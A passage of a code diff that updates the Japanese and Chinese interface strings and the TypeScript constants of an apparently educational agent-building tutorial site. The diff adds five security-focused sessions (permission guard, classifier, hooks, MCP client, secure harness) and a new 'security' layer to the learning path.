Code", "hero_subtitle": "0 から 1 へ nano Claude Code-like agent を構築し、毎回 1 つの仕組みを追加", "start": "学習を始める", "core_pattern": "コアパターン", "core_pattern_desc": "すべての AI コーディングエージェントは同じループを共有する:モデルを呼び出し、ツールを実行し、結果を返す。実運用ではこの上にポリシー、権限、ライフサイクル層が重なる。", "learning_path": "学習パス", "learning_path_desc": "17の段階的セッション、シンプルなループからセキュアな拡張実行まで", "layers_title": "アーキテクチャ層", "layers_desc": "5つの直交する関心事が完全なエージェントを構成", "loc": "行", "learn_more": "詳細を見る", "versions_in_layer": "バージョン", "message_flow": "メッセージの増加", "message_flow_desc": "エージェントループ実行時のメッセージ配列の成長を観察" }, "version": { "loc": "行のコード", "tools": "ツール", "new": "新規", "prev": "前のバージョン", "next": "次のバージョン", "view_source": "ソースを見る", "view_diff": "差分を見る", "design_decisions": "設計判断", "whats_new": "新機能", "tutorial": "チュートリアル", "simulator": "エージェントループシミュレーター", "execution_flow": "実行フロー", "architecture": "アーキテクチャ", "concept_viz": "コンセプト可視化", "alternatives": "検討された代替案", "tab_learn": "学習", "tab_simulate": "シミュレーション", "tab_code": "ソースコード", "tab_deep_dive": "詳細分析" }, "sim": { "play": "再生", "pause": "一時停止", "step": "ステップ", "reset": "リセット", "speed": "速度", "step_of": "/" }, - "timeline": { "title": "学習パス", "subtitle": "s01からs12へ:段階的エージェント設計", "layer_legend": "レイヤー凡例", "loc_growth": "コード量の推移", "learn_more": "詳細を見る" }, + "timeline": { "title": "学習パス", "subtitle": "s01からs17へ:段階的エージェント設計", "layer_legend": "レイヤー凡例", "loc_growth": "コード量の推移", "learn_more": "詳細を見る" }, "layers": { "title": "アーキテクチャ層", - "subtitle": "5つの直交する関心事が完全なエージェントを構成", + "subtitle": "6つの直交する関心事が完全なエージェントを構成", "tools": "エージェントができること。基盤:ツールがモデルに外部世界と対話する能力を与える。", "planning": "作業の組織化。シンプルなToDoリストからエージェント間で共有される依存関係対応タスクボードまで。", "memory": "コンテキスト制限内での記憶保持。圧縮戦略によりエージェントが一貫性を失わずに無限に作業可能。", "concurrency": "ノンブロッキング実行。バックグラウンドスレッドと通知バスによる並列作業。", - "collaboration": "マルチエージェント連携。チーム、メッセージング、自律的に考えるチームメイト。" + "collaboration": "マルチエージェント連携。チーム、メッセージング、自律的に考えるチームメイト。", + "security": "ユーザーをエージェントから保護。権限モデル、セキュリティ分類器、ライフサイクルフック、外部ツールプロトコル。" }, "compare": { "title": "バージョン比較", @@ -50,14 +51,20 @@ "s09": "エージェントチーム", "s10": "チームプロトコル", "s11": "自律エージェント", - "s12": "Worktree + タスク分離" + "s12": "Worktree + タスク分離", + "s13": "権限ガード", + "s14": "セキュリティ分類器", + "s15": "Hooks システム", + "s16": "MCP クライアント", + "s17": "セキュア拡張ハーネス" }, "layer_labels": { "tools": "ツールと実行", "planning": "計画と調整", "memory": "メモリ管理", "concurrency": "並行処理", - "collaboration": "コラボレーション" + "collaboration": "コラボレーション", + "security": "セキュリティと拡張性" }, "viz": { "s01": "エージェント Whileループ", @@ -71,6 +78,11 @@ "s09": "エージェントチーム メールボックス", "s10": "FSM チームプロトコル", "s11": "自律エージェントサイクル", - "s12": "Worktree タスク分離" + "s12": "Worktree タスク分離", + "s13": "権限ガードパイプライン", + "s14": "2層セキュリティ分類器", + "s15": "フックイベントバス", + "s16": "MCPツールディスカバリー", + "s17": "セキュア実行パイプライン" } } diff --git a/web/src/i18n/messages/zh.json b/web/src/i18n/messages/zh.json index a8d9f3651..1f8a491ab 100644 --- a/web/src/i18n/messages/zh.json +++ b/web/src/i18n/messages/zh.json @@ -1,18 +1,19 @@ { "meta": { "title": "Learn Claude Code", "description": "从 0 到 1 构建 nano Claude Code-like agent,每次只加一个机制" }, "nav": { "home": "首页", "timeline": "学习路径", "compare": "版本对比", "layers": "架构层", "github": "GitHub" }, - "home": { "hero_title": "Learn Claude Code", "hero_subtitle": "从 0 到 1 构建 nano Claude Code-like agent,每次只加一个机制", "start": "开始学习", "core_pattern": "核心模式", "core_pattern_desc": "所有 AI 编程 Agent 共享同一个循环:调用模型、执行工具、回传结果。生产级系统会在其上叠加策略、权限和生命周期层。", "learning_path": "学习路径", "learning_path_desc": "12 个渐进式课程,从简单循环到隔离化自治执行", "layers_title": "架构层次", "layers_desc": "五个正交关注点组合成完整的 Agent", "loc": "行", "learn_more": "了解更多", "versions_in_layer": "个版本", "message_flow": "消息增长", "message_flow_desc": "观察 Agent 循环执行时消息数组的增长" }, + "home": { "hero_title": "Learn Claude Code", "hero_subtitle": "从 0 到 1 构建 nano Claude Code-like agent,每次只加一个机制", "start": "开始学习", "core_pattern": "核心模式", "core_pattern_desc": "所有 AI 编程 Agent 共享同一个循环:调用模型、执行工具、回传结果。生产级系统会在其上叠加策略、权限和生命周期层。", "learning_path": "学习路径", "learning_path_desc": "17 个渐进式课程,从简单循环到安全扩展", "layers_title": "架构层次", "layers_desc": "五个正交关注点组合成完整的 Agent", "loc": "行", "learn_more": "了解更多", "versions_in_layer": "个版本", "message_flow": "消息增长", "message_flow_desc": "观察 Agent 循环执行时消息数组的增长" }, "version": { "loc": "行代码", "tools": "个工具", "new": "新增", "prev": "上一版", "next": "下一版", "view_source": "查看源码", "view_diff": "查看变更", "design_decisions": "设计决策", "whats_new": "新增内容", "tutorial": "教程", "simulator": "Agent 循环模拟器", "execution_flow": "执行流程", "architecture": "架构", "concept_viz": "概念可视化", "alternatives": "替代方案", "tab_learn": "学习", "tab_simulate": "模拟", "tab_code": "源码", "tab_deep_dive": "深入探索" }, "sim": { "play": "播放", "pause": "暂停", "step": "单步", "reset": "重置", "speed": "速度", "step_of": "/" }, - "timeline": { "title": "学习路径", "subtitle": "s01 到 s12:渐进式 Agent 设计", "layer_legend": "层次图例", "loc_growth": "代码量增长", "learn_more": "了解更多" }, + "timeline": { "title": "学习路径", "subtitle": "s01 到 s17:渐进式 Agent 设计", "layer_legend": "层次图例", "loc_growth": "代码量增长", "learn_more": "了解更多" }, "layers": { "title": "架构层次", - "subtitle": "五个正交关注点组合成完整的 Agent", + "subtitle": "六个正交关注点组合成完整的 Agent", "tools": "Agent 能做什么。基础层:工具赋予模型与外部世界交互的能力。", "planning": "如何组织工作。从简单的待办列表到跨 Agent 共享的依赖感知任务板。", "memory": "在上下文限制内保持记忆。压缩策略让 Agent 可以无限工作而不失去连贯性。", "concurrency": "非阻塞执行。后台线程和通知总线实现并行工作。", - "collaboration": "多 Agent 协作。团队、消息传递和能独立思考的自主队友。" + "collaboration": "多 Agent 协作。团队、消息传递和能独立思考的自主队友。", + "security": "保护用户免受 Agent 的伤害。权限模型、安全分类器、生命周期 Hook 和外部工具协议。" }, "compare": { "title": "版本对比", @@ -50,14 +51,20 @@ "s09": "Agent Teams", "s10": "Team Protocols", "s11": "Autonomous Agents", - "s12": "Worktree + Task Isolation" + "s12": "Worktree + Task Isolation", + "s13": "Permission Guard", + "s14": "Security Classifier", + "s15": "Hooks System", + "s16": "MCP Client", + "s17": "Secure Extension Harness" }, "layer_labels": { "tools": "工具与执行", "planning": "规划与协调", "memory": "记忆管理", "concurrency": "并发", - "collaboration": "协作" + "collaboration": "协作", + "security": "安全与扩展" }, "viz": { "s01": "Agent While-Loop", @@ -71,6 +78,11 @@ "s09": "Agent Team Mailboxes", "s10": "FSM Team Protocols", "s11": "Autonomous Agent Cycle", - "s12": "Worktree Task Isolation" + "s12": "Worktree Task Isolation", + "s13": "权限守卫管线", + "s14": "双层安全分类器", + "s15": "Hook 事件总线", + "s16": "MCP 工具发现", + "s17": "安全执行管线" } } diff --git a/web/src/lib/constants.ts b/web/src/lib/constants.ts index 0f1fdf7a8..062975992 100644 --- a/web/src/lib/constants.ts +++ b/web/src/lib/constants.ts @@ -1,5 +1,6 @@ export const VERSION_ORDER = [ - "s01", "s02", "s03", "s04", "s05", "s06", "s07", "s08", "s09", "s10", "s11", "s12" + "s01", "s02", "s03", "s04", "s05", "s06", "s07", "s08", "s09", "s10", "s11", "s12", + "s13", "s14", "s15", "s16", "s17" ] as const; export const LEARNING_PATH = VERSION_ORDER; @@ -11,7 +12,7 @@ export const VERSION_META: Record = { s01: { title: "The Agent Loop", subtitle: "Bash is All You Need", coreAddition: "Single-tool agent loop", keyInsight: "The minimal agent kernel is a while loop + one tool", layer: "tools", prevVersion: null }, @@ -26,6 +27,11 @@ export const VERSION_META: Record Classify -> Permission -> Execute -> PostHook", keyInsight: "Production harnesses aren't about more features -- they're about clear responsibilities at every layer", layer: "security", prevVersion: "s16" }, }; export const LAYERS = [ @@ -34,4 +40,5 @@ export const LAYERS = [ { id: "memory" as const, label: "Memory Management", color: "#8B5CF6", versions: ["s06"] }, { id: "concurrency" as const, label: "Concurrency", color: "#F59E0B", versions: ["s08"] }, { id: "collaboration" as const, label: "Collaboration", color: "#EF4444", versions: ["s09", "s10", "s11", "s12"] }, + { id: "security" as const, label: "Security & Extensibility", color: "#06B6D4", versions: ["s13", "s14", "s15", "s16", "s17"] }, ] as const; diff --git a/web/src/types/agent-data.ts b/web/src/types/agent-data.ts index 7cf01a04d..7cff90c72 100644 --- a/web/src/types/agent-data.ts +++ b/web/src/types/agent-data.ts @@ -10,7 +10,7 @@ export interface AgentVersion { keyInsight: string; classes: { name: string; startLine: number; endLine: number }[]; functions: { name: string; signature: string; startLine: number }[]; - layer: "tools" | "planning" | "memory" | "concurrency" | "collaboration"; + layer: "tools" | "planning" | "memory" | "concurrency" | "collaboration" | "security"; source: string; } @@ -40,7 +40,10 @@ export type SimStepType = | "assistant_text" | "tool_call" | "tool_result" - | "system_event"; + | "system_event" + | "permission_check" + | "classifier_check" + | "hook_fire"; export interface SimStep { type: SimStepType;